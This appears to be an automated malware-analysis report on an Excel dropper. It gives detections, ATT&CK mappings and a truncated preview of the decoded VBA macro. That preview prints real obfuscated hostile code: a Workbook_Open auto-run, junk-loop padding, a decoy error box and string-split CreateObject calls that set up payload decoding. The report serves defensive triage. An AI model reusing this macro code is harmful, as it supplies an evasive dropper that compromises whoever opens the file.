Verdict: MALICIOUS
Risk Score: 262
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1071.001 Web Protocols
- T1105 Ingress Tool Transfer
The file is an Excel document containing a Workbook_Open VBA macro. This macro utilizes the Shell() function and CreateObject, indicating an attempt to execute external code. The presence of obfuscated VBA code and the ClamAV detection name 'Doc.Dropper.Agent-6866901-0' strongly suggest this is a dropper malware designed to download and execute a secondary payload. The displayed message box is likely a decoy to mask the malicious activity.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6866901-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6866901-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Workbook_Open macro (high, OLE_VBA_WBOPEN): Workbook_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15907 bytes |

SHA-256: 1f05064cad0fe72cae2443bd7f9dad3a8ac9703c25185ac3674a1c2c261d310d

Detection of the extracted artifact:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 6 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
W_98SuVOM_qkKn8UpM.BRvz9_aLyD6iRde3pPcQ
While 13 = 5839
Dim PhUyQUMMnWbCsqrasWioj4sDixRfCYwb1 As String
Wend
Dim ALdHw_9kXgEN As Byte
While 14 = 1319
Dim uxINgEqJVVxQNbCpJNi_Knpd7ijdp8dJ7SCdVx1quprnXL3TARYI8ECEF As String
Wend
Dim oP8dKcW1mS As Byte
While 12 = 1644
Dim XhSVV1Md5BEtoObWgTL1P6Vpf3LhKT As String
Wend
Dim vt285a8CvE1gJ As Byte
While 18 = 6546
Dim heQNsEyfYbmbKlybnoRjNT2pT_XdgE9ruPGAj7x_dNTYSa As String
Wend
Dim OUMRaKNjzMmk As Byte
cV2IKFjOTfHz4 = MsgBox("Version not compatible", vbCritical, "Error")
While 20 = 2370
Dim rqS8Rb5p5dx2pzL___aU2tBPNnwcJY4V9CEWJPA7XuS1XZ As String
Wend
Dim tTBdzLKNB7nC As Byte
While 21 = 406
Dim smoZedjZ2mtx4r8d6EYJ1x4baoipJs_GsFgVQ8NyP8gEjLjFNqR5gbK5sK As String
Wend
Dim z43NGmkDwJk As Byte
While 8 = 2129
Dim K81j42Ox1M_bacZ_jO4km_8X4VrXa8Gw5ldSC6hRn4Suuaa As String
Wend
Dim uqhAx2h7F9bpg As Byte
While 5 = 4126
Dim IzU3_Pgx9EAmqk7rtKlb47q37S5UoVTjO_H As String
Wend
Dim xgZpc4mukfVEOk As Byte
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "W_98SuVOM_qkKn8UpM"
Dim wg_yILpXTbn6lu3KgyZNRgEIffpkVbyg1wWBKmHo56eMbACjP89aopkOZ5 As String
Dim iPX5nwqIEQLOapBTlnfYawhLTVTWPb6TiSrU8bc_HT1mXwQdMCug_EovrKiPbS3lT1pF7pVIJfPF As String
Dim YxcDCPpoV_B_TfqZrkMnURdbDwiAxuBONlwyOU6PDV_6l_IXYQvgkalFRA9Npozk8vzrs1IUo As Integer
Function NVvyMlKGa5tUJHkuYWpaGIReHgOJEUjLnsZ_gtBW7oEd5GrdHyF8(zAbLrWTXBmwJfC_nQj1QZnDTurdfSp1gztrlwSHu5fnXls4HNU6VrZmK6FZ_2x_TuNTuTWz8Z_V3_orAwUP7tdyXFfop2H2EaRlVXHx1d75lDsKPXXKffF)
While 25 = 8137
Dim v1Q3M4gxL8oOFnVLp_t2UJE6Kel6sK36m2JAsHSbJQ As String
Wend
Dim CQn157h7fd2Zh As Byte
While 23 = 1032
Dim jtTqqQj_ADslMbUbgpQpDFwQSjnWunWCKSjPWa As String
Wend
Dim lJjKBM5NqdLd9 As Byte
While 12 = 154
Dim xjsdb6CWElKRUpoZ31D_ECFE1DiU_3IJPnhabyGSSDfgW3pfNwwlGY3uclm As String
Wend
Dim WVqQLb_AqFL8Dst As Byte
iPX5nwqIEQLOapBTlnfYawhLTVTWPb6TiSrU8bc_HT1mXwQdMCug_EovrKiPbS3lT1pF7pVIJfPF = "MsXMl" & "2.dOMDOCumEnt"
While 10 = 7657
Dim tAfhq7WBEP_gC1tw8yKs6luRDW19YBys2Vn1N45o9 As String
Wend
Dim SjAF57I6RNH As Byte
While 7 = 125
Dim wFOLdSEXkDZTnoK3hC3ftlBsJHYpBFvp23hgjAYjhiqejvOQ7Bs As String
Wend
Dim JNTNJDfAT4XUd As Byte
While 6 = 6635
Dim PsbuEmQgmR7I4fGX2Gs9VkafmVcD9DpILLMzRdJStKg5V_PgWlbuoVGoP6F As String
Wend
Dim rILghkw6qQPE As Byte
Dim ItnO_XeMSXSr1PeKuUP5nuC9tnpoWZZOPP7C_lFWAhnR_Pr4QtvdYwOWpoeUqyz37DajRaJGM34EFt8b5vWlm5yc_iVTFupJruT6yGjzhmPf2HP5pBY5aLNAN7is_
Dim rDCiWbwL_yvnnMAxSsL5MJAr5dEsnseUB5jaoeg1HAx_K6czamHKnsKgCTm3VDgURYlrliHxKUvKV5f8_NP_iSqQrBWS1mcDbauuStM2dT9R7_JFxn2Gvgv9qT_iJx7g1qr4
While 20 = 2363
Dim V7YNIDeHhE6pUk5czDhiVWaHfm8SiGiNEf_xOF8juvhlMfJ7pR_lr As String
Wend
Dim qs9dOqeEKiYepi As Byte
While 1 = 5050
Dim yeEMsE7wiyx5_a_mPC6fWvER_YadhLGFf7TaiDU As String
Wend
Dim ft3HIpSqCEhQVh As Byte
While 14 = 467
Dim IJCYwMRmbMVpqWBFgCKpYucm5lorXX_4tgVuQBuzB3Qnvb85n6gdEoHWp As String
Wend
Dim YcJhjNDMa6HA As Byte
While 28 = 6825
Dim OxePUnfcxzbmsCazdxDX9_2gjQZmLZSfy4WGAMtAl41h_gxgv As String
Wend
Dim Lrm1tAJ57pCL2OW As Byte
While 10 = 8282
Dim e6wxnSxPCCu_MSgBb31_rpoD2LKDfpwtmcBDs92bWZ As String
Wend
Dim iw967kYmjS_Ooy As Byte
While 20 = 3031
Dim Ps5aGttVOAZtPbRc_XlPE1_6Oim3EcsWxKw9CZSlpLg8eKT7TFRk As String
Wend
Dim mWsXn9JgEzPuPB As Byte
Set rDCiWbwL_yvnnMAxSsL5MJAr5dEsnseUB5jaoeg1HAx_K6czamHKnsKgCTm3VDgURYlrliHxKUvKV5f8_NP_iSqQrBWS1mcDbauuStM2dT9R7_JFxn2Gvgv9qT_iJx7g1qr4 = CreateObject(iPX5nwqIEQLOapBTlnfYawhLTVTWPb6TiSrU8bc_HT1mXwQdMCug_EovrKiPbS3lT1pF7
... (truncated)